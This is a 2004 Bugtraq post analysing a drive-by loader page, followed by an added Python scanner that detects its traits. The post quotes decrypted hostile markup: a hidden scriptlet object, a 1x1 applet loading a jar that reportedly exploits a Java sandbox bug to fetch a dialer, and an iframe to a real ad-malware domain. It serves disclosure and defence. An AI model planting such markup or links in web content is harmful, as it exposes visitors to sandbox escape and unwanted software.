Bugtraq mailing list archives

Strange Java Loader
From: duffbeer <duffbeer () gmx net>
Date: Thu, 30 Dec 2004 07:34:23 +0100

Hi People,

before reading this,
don't go on any of the sites
unless you are sure ;)

after decrypting some stuff, this is the source from:
<iframe src="";>
<iframe src="http://www.awmcash.biz/adverts/14/1.htm";>

this is the source from one of the iframes
<textarea id="cxw" style="display:none;">
    <object data="${PR}" type="text/x-scriptlet"></object>

<script language="javascript">
<applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter></APPLET></body></html>

the jar archive loaderadv346.jar contains some Java classes
which exploit the URLClassLoader bug (BlackBox.class).
it overrides the sandbox and downloads a loadadv346.exe from:

this seems to be a dialer or something like this,
it changes the hosts file, creates some spawn files,
you can look for yourself, I included the file
and the Java stuff, the loadadv is upx'd,

so far, does anyone know how to protect from this crap?
you're welcome to send some solutions ;)

cya, Stefan

Attachment: loaderadv.zip
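
One way to triage saved page source for the traits the message describes (an applet sized 1x1 that pulls a jar archive, an object of type text/x-scriptlet, iframes to follow up), added here as an example and not part of the original message. The `scan` function, the rule names and the sample page are constructed for illustration, and the iframe URL in the sample is a placeholder.

```python
import re

# Constructed sample modelled on the fragments quoted in the message; the
# iframe URL is a placeholder, not a value taken from the post.
SAMPLE = '''<html><body>
<iframe src="http://example.invalid/adverts/1.htm"></iframe>
<textarea id="cxw" style="display:none;">
    <object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter></APPLET>
</body></html>'''

# Raw-text matching on purpose: markup parked inside a textarea is still seen.
TAG = re.compile(r"<(iframe|applet|object)\b([^>]*)>", re.I)
ATTR = re.compile(r"([\w-]+)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)")

def attrs_of(raw):
    """Lower-cased attribute dict; handles quoted and unquoted values."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR.findall(raw)}

def tiny(a):
    """True when width and height are both present and at most 1 pixel."""
    try:
        return int(a["width"]) <= 1 and int(a["height"]) <= 1
    except (KeyError, ValueError):
        return False

def scan(html):
    """Return (rule, detail) findings for the traits described in the post."""
    findings = []
    for m in TAG.finditer(html):
        tag, a = m.group(1).lower(), attrs_of(m.group(2))
        if tag == "applet":
            if a.get("archive", "").lower().endswith(".jar"):
                findings.append(("applet-jar", a["archive"]))
            if tiny(a):
                findings.append(("applet-1x1", a.get("code", "")))
        elif tag == "object" and a.get("type", "").lower() == "text/x-scriptlet":
            findings.append(("scriptlet-object", a.get("data", "")))
        elif tag == "iframe" and a.get("src"):
            findings.append(("iframe", a["src"]))  # context: next page to pull
    return findings

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE):
        print(f"{rule:18} {detail}")
```

An iframe hit on its own is only a pointer to the next page to fetch offline and scan; the applet and scriptlet rules are the ones that match what the message reports.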
